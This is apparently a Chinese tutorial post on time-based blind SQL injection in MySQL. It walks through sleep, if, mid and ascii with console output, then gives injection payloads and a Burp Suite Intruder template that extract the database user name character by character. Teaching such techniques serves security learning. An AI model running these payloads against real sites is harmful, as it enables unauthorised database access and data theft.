时间盲注
通过使用sleep函数
and sleep(参数) 在F12出来的网络选项中观察时间的变化
返回结果为0
if(1,’true’,’false’) 返回结果为true -条件,真返回,假返回
+———————-+
| if(1,’true’,’false’) |
+———————-+
| true |
+———————-+
mid(选择的字符串,从第几个字符开始选择,选择几个字符);
返回值为截取的字符
举个栗子:
mysql> select mid(user(),1,1);
+—————–+
| mid(user(),1,1) |
+—————–+
| r |
+—————–+
1 row in set (0.01 sec)
mysql> select mid(user(),2,1);
+—————–+
| mid(user(),2,1) |
+—————–+
| o |
+—————–+
1 row in set (0.00 sec)
mysql> select mid(user(),1,4);
+—————–+
| mid(user(),1,4) |
+—————–+
| root |
+—————–+
ascii(字符) 显示字符的ascii码
mysql> select ascii(‘a’);
+————+
| ascii(‘a’) |
+————+
| 97 |
+————+
举个栗子:
我要猜解 user名字 但是没有返回值咋办 这就是我们所说的 盲注
总体使用时间盲注
首先 先破解一手长度 这时就要用到length函数啦
我使用的是and if(length(user())=0,sleep(5),1)
接下来就是用burpsuite 抓包跑起来
找出长度不同于其他的那个小可爱
说明参数为14的时候 结果和其他的不同 说明长度就是14啦
接下来破解表名
and%20if(ascii(mid(user(),§1§,1))=§0§,sleep(5),1)
设置两个变量开始跑,1700多个结果,慢慢跑,最后出了结果
payload1对应着第一个变量,也就是字母的位置,payload2对应着第二个变量,也就是对应字母的ascii码,慢慢弄.
大概就是这些,下期再会~